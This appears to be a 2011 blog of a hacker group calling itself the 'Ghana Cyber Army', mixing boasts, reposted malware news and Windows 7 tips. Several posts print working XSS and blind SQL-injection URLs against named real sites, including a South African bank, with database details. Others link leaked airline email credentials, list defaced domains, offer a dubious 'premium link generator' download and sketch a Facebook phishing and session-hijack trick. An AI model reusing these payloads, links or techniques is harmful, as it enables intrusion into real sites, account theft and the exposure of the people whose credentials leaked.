Thursday, 1 December 2011

PLs Pls This A Serious TV3 Website Is Affected With A Malware Which May Harm Your PC


PLS PLS This  Serious TV3 Website Is Affected With A Malware Which May Harm Your PC. Our research shows that the virus was from a Chinese Group of hackers. With this we the Ghana Cyber warns the Public to stay away from the site for a while till TV3 deals with the Problem. 
TV3  Malware

Vulnerability Description
网站被google屏蔽
通过google搜索您的网站,搜索结果中会显示“该网站可能含有恶意软件,有可能会危害您的电脑”。
如果使用chrome或firefox浏览器直接访问您的网站,此时打开的页面不是您网站本身页面,而是谷歌的提示页面,提示“访问该网站可能会损害您的计算机!”或“已报告的攻击页面!”等字句来警告访问的用户。
Vulnerability Impact
如果网站被google屏蔽,那么从google搜索引擎过来的流量必然受到严重影响;而关键是对网站信誉造成严重影响。
Vulnerability Recommendation
一:确认网站是否被挂马或有病毒,如果有,先清理
二:扫描并修复网站漏洞
三:根据google的要求重新进行审核
Additional Info

Vulnerability content
Site is listed as suspicious - visiting this web site may harm your computer.

We as a Group are doing Everything in Our Power to Pay Back these Hackers with a taste of their Own. TV3 can Contact us if the need be and any can inform their admins about this.

Multiple XSS Pages Found In Gold Fields (goldfields) by Ge3h

The Ghana Cyber Army is at it again.
Ge3h found these Multiple XSSeds in Gold Fields funny hmhhm with the gold they no fit
keep a single site protected.

Links:
http://www.goldfields.co.za/search.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

http://www.goldfields.co.za/inv_calendar.php?yearMonthDay=20111110&yearMonth=201111%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert(0x000823)%3C%2Fscript%3E

http://www.goldfields.co.za/search.php?zoom_and=0&zoom_per_page=3&zoom_query=3&zoom_sort='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A83)%3C/script%3E

http://www.goldfields.co.za/search.php?zoom_query=3&zoom_and=1&zoom_sort='"--></style></script><script>alert(0x000A87)</script>

http://www.goldfields.co.za/inv_calendar.php?yearMonth=201110%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert(0x000F5E)%3C%2Fscript%3E

http://www.goldfields.co.za/search.php?zoom_query=search+this+site&zoom_page=2%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert(0x001C4A)%3C%2Fscript%3E&zoom_per_page=10&zoom_cat=-1&zoom_and=0&zoom_sort=0

http://www.goldfields.co.za/search.php?zoom_query=search+this+site&zoom_page=2&zoom_per_page=10%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert(0x001C8F)%3C%2Fscript%3E&zoom_cat=-1&zoom_and=0&zoom_sort=0


And even more to come................................................ soon

Guadeloupe Google / Microsoft/ Motorola / Orange / Facebook / Youtube / Myspace / Live / Hotmail / Bing / Visa / Opera / Gmail / Joomla / Ubuntu / Internet / Bank America Hacked By dr@g







A Hacker called dr@g has Hacked Guadeloupe Google / Microsoft/ Motorola / Orange / Facebook / Youtube / Myspace / Live / Hotmail / Bing / Visa / Opera / Gmail / Joomla / Ubuntu / Internet / Bank America has been Hacked and has Defaced it. The Hacker is in the team called Moroccain Security Cr3w.

Site:
http://www.google.gp/
http://www.google.com.gp/
http://www.google.net.gp/
http://microsoft.gp/
http://internet.gp/
http://motorola.gp/
http://orange.gp/
http://www.oracle.gp/
http://opera.gp/
http://ubuntu.gp/
http://yahoo.gp/
http://www.facebook.gp/
http://www.youtube.gp/
http://www.bing.gp/
http://www.joomla.gp/
http://www.myspace.gp/
http://www.ciscosystems.gp/
http://www.googleplus.gp/
http://www.gmail.gp/
http://live.gp/
http://bankamerica.gp/

Mirror:
http://www.zone-h.com/mirror/id/14877986
http://www.zone-h.com/mirror/id/14877923
http://www.zone-h.com/mirror/id/14877133
http://www.zone-h.com/mirror/id/14877973
http://www.zone-h.com/mirror/id/14877865
http://www.zone-h.com/mirror/id/14877897
http://www.zone-h.com/mirror/id/14877917
http://www.zone-h.com/mirror/id/14877916
http://www.zone-h.com/mirror/id/14877915
http://www.zone-h.com/mirror/id/14877912
http://www.zone-h.com/mirror/id/14877082
http://www.zone-h.com/mirror/id/14877090
http://www.zone-h.com/mirror/id/14877091
http://www.zone-h.com/mirror/id/14877094
http://www.zone-h.com/mirror/id/14877096
http://www.zone-h.com/mirror/id/14877119
http://www.zone-h.com/mirror/id/14877171
http://www.zone-h.com/mirror/id/14877235
http://www.zone-h.com/mirror/id/14877294
http://www.zone-h.com/mirror/id/14877820
http://www.zone-h.com/mirror/id/14877983
http://www.zone-h.com/mirror/id/14877864

Hacking a Facebook Account using Facebook


Many of us know that phishing is also a trick to hack a facebook and session hijicking but hacker can do both at a same time. This vulnerability was happened on Facebook (static FBML) .Example here

What user will do ??
1. Checks for the URL.
2. Checks for which year the page was create.

Is it easy to fool the people?
Yes, by creating a new page in facebook in such way that user has to beliveness.

How its work??
1.Once the user clicks the link the session(cookies) where stolen by the hacker using That he can login any users account without a username and password
2. usually the users will check for the URL once it was known 1 they can enterning a userename and password.
3.After hitting the button Test your Password , Page will reflect a Thankyou Msg and it will popup with a paswd Rank 
4. Check ur email spam there must a email on this and it will say that ur password was wrong trying again 

Countermeasures:
1.Dont click a new link from a person u don’t know..
2.Facebook is not going to ask ur password is strong are not.
3.Some of the virus and worm (scam) was spreading in facebook applications.

SMS Trojans Spreading to the Rest of the World



SMS Trojans that ride along on supposedly benign mobile apps and then send out messages to high-priced numbers have been a problem in some Asian and Eastern European countries for several years now, most notably in Russia and China. But now the attackers have realized that there's a whole big world of users out there to target and have begun going after people in other countries with new strains of SMS malware.
A new SMS Trojan that has been seen in some limited infections so far, is targeting users in a number of European and western countries right now, including Belgium, Canada, France, Germany, Luxembourg, Spain, Switzerland and the UK. The Trojan has a couple of main functions, each of which is designed to deceive the user and surreptitiously run up charges on her mobile bill.
The Trojan has been seen thus far hiding inside an app that supposedly monitors the victim's SMS and data usage on the device.

The Android app has shown up on file-sharing sites under the name SuiConFo.apk, according to research by Kaspersky Lab researcher Denis Maslennikov, and once it's installed on a victim's device, it will initially display an error message saying that the user's device isn't compatible with the app. That's just the beginning, however.
"Right after displaying this message the Trojan will call the public method getSimCountryIso in the TelephonyManagerclass in order to retrieve the ISO country code of the SIM card," Maslennikov wrote. "After defining the country and, therefore, the number and message text, the Trojan will send 4 SMS messages with the help of thesendTextMessage method. SMSReceiver.class is responsible for hiding incoming SMS messages from particular numbers. If there is an incoming SMS message from one of the following numbers: 81001, 35064, 63000, 9903, 60999, 543, 64747, then the Trojan will try to hide it using the abortBroadcast method. The number itself is retrieved from the SMS message with the help of getDisplayOriginatingAddress."
So the Trojan will remain in the background, checking for incoming messages from specific SMS numbers, and will then hide those messages from the user so she isn't aware of the infection and the fact that outgoing messages are being sent to premium-rate numbers. The charges for those messages can accumulate quickly, and if the user isn't aware that they're being sent, it can be an expensive infection.
Researchers have found similar SMS Trojans going after users in the United States, the UK and the Netherlands in recent months, but infections have been limited so far. That may well change as the popularity of Android devices--which have been the main target for SMS Trojans--continues to increase.

New Facebook Worm installing Zeus Bot in your Computer

Today another new attack on Facebook users with Zeus Bot comes in action. The researchers of Danish security firm CSIS, has spotted a worm spreading within the Facebook platform. A new worm has popped up on Facebook, using apparently stolen user credentials to log in to victims' accounts and then send out malicious links to their friends. The worm also downloads and installs a variety of malware on users' machines, including a variant of the Zeus bot.

If followed, the link takes the potential victim to a page where he or she are offered what appears to be a screensaver for download. Unfortunately, it is not a JPG file, but an executable (b.exe). Once run, it drops a cocktail of malicious files onto the system, including ZeuS, a popular Trojan spyware capable of stealing user information from infected systems. The worm is also found to have anti-VM capabilities, making it useless to execute and test in a virtual environment, such as Oracle VM VirtualBox and VMWare.

Zeus is a common tool in the arsenal of many attackers these days, and is used in a wide variety of attacks and campaigns now. It used to be somewhat less common, but the appearance of cracked versions of the Zeus code has made it somewhat easier for lower-level attackers to get their hands on the malware. Zeus has a range of capabilities, and specializes in stealing sensitive user data such as banking credendtials, from infected machines.

"The worm carries a cocktail of malware onto your machine, including a Zbot/ZeuS variant which is a serious threat and stealing sensitive information from the infected machine," warn the researchers.The worm is hosted on a variety of domains, so the link in the malicious message may vary. Other servers are used to collect the data sent by the aforementioned malware and to serve additional malicious software.

This type of thing is very rare to just send to your email without you requesting it so I would advise anyone who thinks that you may have seen an email like this to delete it and mark it as spam right away.

Sunday, 27 November 2011

Sudan Airways mailbox database leaked

Sudan Airways mailbox database Hacked By Sudan Cyber Army - SD. Alsa7r and Leaked on Pastebin. The Targeted domains are sudanair.com  & omyalphaserver.com . This Include more than 100's of Usernames, Emails, Passwords. Sudan Cyber Army in past hack lots of Sudan Government Sites.
Leaked link: e-mail + pass  http://pastebin.com/vKT0UwBf

Hello Friends and Readers (Ge3H hAcK3rb0Y Is Back From his Break We Will Sooon See More hacks)

Hello Friends and Readers Sorry we (Ghana Cyber Army) could not pond you with some hacks this week. We were a bit busy. Due to the Fact that Ge3H hAcK3rb0Y was  doing some important fings but he is now back so we can say more Gh and Africa Hacks Sooooooon.

Welcome Ge3H

Sign
Hack Con
Member Ghana Cyber Army

Tuesday, 22 November 2011

The White House Official Facebook Page Hacked

Official Facebook page The White House defaced for a short time on Sunday, the tenth anniversary of the 9/11 terror attacks, with posts that appeared to be from Al-Qaeda, Taliban, or perhaps another terrorist organization.The posts came as authorities continue to exercise caution over what they called a"credible" threat against the United States, one that may involve attacks on infrastructure such as bridges or tunnels. The information provided by a source was scant, but indicated that three men would travel from Pakistan to the U.S. to carry out an attack.
The messages have been removed from the Facebook page, but one message, which featured an image of now dead 9/11 mastermind and Al-Qaeda leader Osama bin Laden, said, "We'll come back U.S.A. One day only 11/9/2011." Despite the format, the message refers to 9/11, using the day / month format used in other parts of the globe.
Another said, "We'll come to u white house sooooooooooon." A third said, "We'll come back 11/9/2011 to kill u all."
 Secret Service spokesman Ed Donovan said that the agency had referred the messages to its Internet threat desk.

Monday, 21 November 2011

Cotton Candy USB with Dual-Core Computer can turns Any Screen Into an Android Station

Norwegian company FXI Technologies has been showing a USB stick-sized portable computer prototype, featuring with a dual-core 1.2-GHz CPU, 802.11n Wi-Fi, Bluetooth, HDMI-out and a microSD card slot for memory.

Codenamed Cotton Candy because its 21 gram weight is the same as a bag of the confection, the tiny PC enables what its inventor calls “Any Screen Computing,” the ability to turn any TV, laptop, phone, tablet, or set-top box into a dumb terminal for its Android operating system.

The Cotton Candy has a USB 2.0 connector on one end and an HDMI jack on the other. When connected to an HDTV, it uses the HDMI port for video, the USB for power, and Bluetooth to connect to a keyboard, mouse, or tablet for controlling the operating system. The device can output up to 1080p so even a full HD screen can display the Candy’s preloaded Android 2.3 operating system at its native resolution. The dual core CPU can even play local 1080p video or stream HD clips from the internet.
The idea behind it is similar to that of FXI’s Cotton Candy, in the sense that you will need to boot Android from a USB stick. Alternatively you could use an SD card as well. They’ve managed to get just about everything up and running, including Android Market, but it seems that the majority of users who managed to get this running successfully have been owners of ASUS branded PCs, although we can’t be sure of the reason behind that particular phenomenon.

For more information about the Android-x86 project, or if you’re looking for a way to load up Android’s Honeycomb 3.2 onto your laptop or PC, head on down to Android-x86’s website for the details. In the meantime you can check out this guy who managed to load Honeycomb 3.2 onto his ASUS Eee PC.

From developers to students to mobile workers, there are a number of groups that could find innovative ways to use a computer the size of a USB stick. However, you won’t see a consumer product shipping anytime soon from FXI. The company plans to sell the Cotton Candy to developers and let OEMs license the technology and turn it into something that can appeal to a wide audience.
 
Just receive testing copy Ghana Cyber Arny we the best Ghana ever seen 
 

Megaupload Premium Link Generator [ Instructions Included ]


HOW TO USE: 1.Setup Megakey 2.Open Megakey (When Setup Done) 3.Now Click on "Megakey Benefits" 4.Now Fillup The Page 5.Go to a Megaupload Link and You'll See Direct Premium Download EnJoY Download: this part of youre post is hidden Code: http://www.filesonic.com/file/
3898903634/MU_PLG.rar

Multi Vuln Found In A Big Bank In South Africa (Fisrt Rand Bank Group) by GhAnA CyB3r AmrY

Fisrt Rand Bank Group

XSS http://www.firstrand.co.za/live/click.php?cookie=k&Src=/'/"()%26%251<ScRiPt%20>prompt(989331)</ScRiPt>&URL=index.php

SQLi :http://www.firstrand.co.za/live/click.php?cookie=k&Src=&URL=index.php%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20

Additional Info
Injection Type: Integer
Database Type: MySQL
Database name: wwwfirstrand

Sunday, 20 November 2011

Multi Vuln Found In Peace FM Dot Com by GhAnA CyB3r ArMy

Sorry guys u ve a nice station but fix it
like kokrokroooooooo sooo much nafin was taking away from ur site

Hey Kwame wat up hahahahahaha :)

 xss: http://www.peacefmonline.com/tgpolls/vote.php?answerid=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28953178%29%3c%2fScRiPt%3e&polldated=2011-Oct-11&pollid=63&VOTE=Vote


SQLi *(Blind): http://www.peacefmonline.com/tgpolls/vote.php?answerid=314&polldated=2011-Oct-11&pollid=63%20and%20sleep%282%29%20&VOTE=Vote

Additional Info
Injection Type: Integer
Database Type: MySQL
Database name: information_schema, peace_polls, @@@@@@@ etc


Multi XSS and Blind SQLi Found In Ghana Web Ge3h HaCk3rBoy

Multi XSS and Blind SQLi  Found In Ghana Web Ge3h HaCk3rBoy

xss: http://www.ghanaweb.com/displaypreference.php?url=www.ghanaweb.com%2F?url=www.ghanaweb.com/&submit=Preview%20Setting&display_preference=1"><script>alert(42873);</sCript>


SQLi *(Blind): http://www.ghanaweb.com/banner/clicked.php?ID=393
Additional Info
Injection Type: Integer
Database Type: MySQL
Database name: rijl2_PROD
      

Friday, 18 November 2011

Top 20 Windows 7 tips,tricks,tweaks and secrets

The Latest OS release Windows 7 is very much cool and faster than all of the previous windows versions.

Like the Previous Windows OS there are many secrets,tips,tricks,tweaks and hacks but the top 20 secrets which we300allpctips recommend to7 users are as follows.

1)Fix the Clutter:
Remove all background windows while running/using a document by just pressing WIN+HOME keepong the window while ur in the current position,to restore the background windows press WIN+HOME again.

2)Problem Steps Recorder(PSR):
PSR is a great little tool in Windows 7 used for recording the steps to reproduce a problem in the computer. The captured data is stored in a MHTML document which is enclosed in a zip file. You can send the zip file to someone else who can help you fix the problem.
The Problem Steps Recorder provides an easy way for users to record a problem repro for later diagnosis.
The Problem Steps Recorder provides a simple screen capture tool that enables you to record a series of actions. Once you hit “record”, it tracks your mouse and keyboard and captures screenshots with any comments you choose to associate alongside them. Once you stop recording, it saves the whole thing to a ZIP file, containing an HTML-based “slide show” of the steps. It’s a really neat little tool and I can’t wait for it to become ubiquitous on every desktop! The program is called psr.exe; you can also search for it from Control Panel under “Record steps to reproduce a problem”. 

3)Running with Elevated Rights: Want to quickly launch a taskbar-docked application as an administrator? It’s easy – hold down Ctrl+Shift while you click on the icon, and you’ll immediately launch it with full administrative rights (assuming your account has the necessary permissions, of course!)


4) Keyboard shortcuts:
Windows 7 has several useful new keyboard shortcuts.


Alt+P ->Display/ hide the Explorer preview pane

Windows Logo+G ->Display gadgets in front of other windows

Windows Logo++ (plus key) ->Zoom in, where appropriate

Windows Logo+- (minus key) ->Zoom out, where appropriate

Windows Logo+Up ->Maximise the current window

Windows Logo+Down ->Minimise the current window

Windows Logo+Left ->Snap to the left hand side of the screen

Windows Logo+Right ->Snap to the right hand side of the screen

Windows Logo+Home ->Minimise/ restore everything except the current window

Shift + Click on icon ->Open a new instance 


Middle click on icon ->Open a new instance


Ctrl + Shift + Click on icon ->Open a new instance with Admin privileges


Shift + Right-click on icon ->Show window menu (Restore / Minimize / Move / etc) Note: Normally you can just right-click on the window thumbnail to get this Menu


Shift + Right-click on grouped icon ->Menu with Restore All / Minimize All / Close All, etc.


Ctrl + Click on grouped icon ->Cycle between the windows (or tabs) in the group 


5)Display your drives:
My Computer in Windows 7 hides drives like memory card readers etc.. if they're empty.We think it's helpfull and an improvement, but if you disagree then launch Explorer, click Tools > Folder Options > View and clear "Hide empty drives in the computer folder" to get your empty drives back. 


6)Burn images:
ISO images can be burned into CD/DVD Drives in windows 7 ,To burn an ISO Just double-click the ISO image, choose the drive with the blank disc, click Burn and watch as your disc is created.
You can burn an ISO image to disk with this built-in utility in Windows 7. 


7)Windows Movie Maker:
Windows 7 doesn’t include a movie editing tool – it’s been moved to the Windows Live Essentials package, along with Photo Gallery, Mail and Messenger. Unfortunately, Windows Live Movie Maker is currently still in an early beta that is missing most of the old feature set.best solution for this is to use Windows Movie Maker 2.6 (which is essentially the same as the most recent update to the Windows XP version). It’s missing the full set of effects and transitions from the Windows Vista version, and doesn’t support HD editing, but it’s pretty functional for the typical usage scenario of home movie editing. 
Windows Movie Maker 2.6 is compatible with Windows 7.
Download Windows Movie Maker 2.6 from here: 
http://microsoft.com/downloads/details.aspx?FamilyID=d6ba5972-328e-4df7-8f9d-068fc0f80cfc 


8)Protect your MP3 files:
Along with many good new features, the Windows 7 beta also includes a nasty bug. Its version of Windows Media Player 12 will automatically add missing metadata, including album art, and this can overwrite the first few seconds of the file. Oops. Installing an update may fix this (fromhttp://300allpctips.blogspot.com/2009/01/kb961367-windows-7-beta-wmp-12-corrupt.html) but it would be a very good idea to back up your MP3 files, too.


9)System Repair Disc:
There are always in Bad times when you’re in a really bad spot – you can’t boot up properly, and what you really want is something you can quickly use to get at a command prompt so you can properly troubleshoot. Windows 7 now includes the ability to create a system repair disc, which is essentially a CD-bootable version of Windows that just includes the command prompt and a suite of system tools. Just type “system repair disc” in the Start Menu search box, and you’ll be led to the utility.


10)Right-click everything:
Right-click an empty part of the desktop, for instance, and you'll find a menu entry to set your screen resolution. No need to go browsing through the display settings any more.

Right-click the Explorer icon on the taskbar for speedy access to common system folders: Documents, Pictures, the Windows folder, and more.

And if you don't plan on using Internet Explorer then you probably won't want its icon permanently displayed on the taskbar. Right-click the icon, select "Unpin this program from the taskbar", then go install Firefox, instead.



11)Hide Windows Live Message Icon:
Windows Live Messenger is front and central on the taskbar, where you can easily change status and quickly send an IM to someone: 
Windows Live Messenger appears by default on the taskbar. 
To hide it from task bar just close Windows Live Messenger, edit the shortcut properties and set the application to run in Windows Vista compatibility mode.Done!


12)Faster video access:
Windows 7 now lets you add Videos folder to the Start menu. Just right-click the Start orb, click Properties > Start Menu > Customize, and set the Videos option to "Display as a link". If you've a TV tuner that works with Windows 7 then you'll appreciate the new option to display the Recorded TV folder on the Start menu, too.


13)Create and Run Web Searches:
The Windows 7 search tool can now be easily extended to search online resources, just as long as someone creates an appropriate search connector. To add Flickr support, say Something like [http://300allpctips.blogspot.com/flickrsearch], click Download the Connector, choose the Open option and watch as it's downloaded (the file is tiny, it'll only take a moment). A "Flickr Search" option will be added to your Searches folder, and you'll be able to search images from your desktop.


14)User Account Control(UAC) Customization:
Windows Vista's User Account Control was a good idea in practice, but poor implementation put many people off - it raised far too many alerts. Fortunately Windows 7 displays less warnings by default, and lets you further fine-tune UAC to suit your preferred balance between security and a pop-up free life (Start > Control Panel > Change User Account Control Settings).


15)Pin Your Favorite Folders:
If you’re always working in the same four or five folders, you can quickly pin them with the Explorer icon on the taskbar. Hold the right-click button down and drag the folder to the taskbar, and it will be automatically pinned in the Explorer Jump List.


16)Taskbar Fix:
The new Windows 7 taskbar acts as one big quick launch toolbar that can hold whatever program shortcuts you like (just right-click one and select Pin To Taskbar). And that's fine, except it does consume a little more screen real estate than we'd like. Shrink it to a more manageable size by right-clicking the Start orb, then Properties > Taskbar > Use small icons.
If you've no problem with the taskbar size, but find the way it combines icons to be confusing, then right-click the Start orb, click Properties > Taskbar and set "Taskbar buttons" to "Combine when taskbar is full" for a more familiar XP and Vista-style look.


17)Installing from USB Stick:
You can Boot and install Windows 7 from USB. Which i had explained it in my previous post where you can read it Install Windows 7 from USB/Flash Drive.


18)Desktop Peeking:
While you’re on the taskbar, it’s worth noting a few subtleties. You’ve probably seen the small rectangle in the bottom right hand corner: this is the feature we call “Aero Peek”, which enables you to see any gadgets or icons you’ve got on your desktop. I wanted to note that there’s a keyboard shortcut that does the same thing – just press Win+Space. 


19)BitLocker and BitLocker to Go:
http://i.technet.microsoft.com/windows/dd408739.BitLockerBitLocke%20toGo.jpg
In Windows 7, core BitLocker Drive Encryption functionality is enhanced to deliver an improved experience for end users—from simple enhancements such as the ability to right-click on a drive to enable BitLocker protection to the automatic creation of the required hidden boot partition. Learn about these enhancements and the new BitLocker To Go, which gives system administrators control over howremovable storage devices can be used and the strength of protection required.


20)Deployment Image Servicing and Management(DISM):
Explore Deployment Image Servicing and Management (DISM), a new command-line tool for Windows 7 and Windows Server 2008 R2. DISM consolidates the core image management functions of multiple tools found in the Windows Automated Installation Kit (AIK) and enables users to view components of an applied or mounted operating system image and add or remove packages, software updates, and drivers.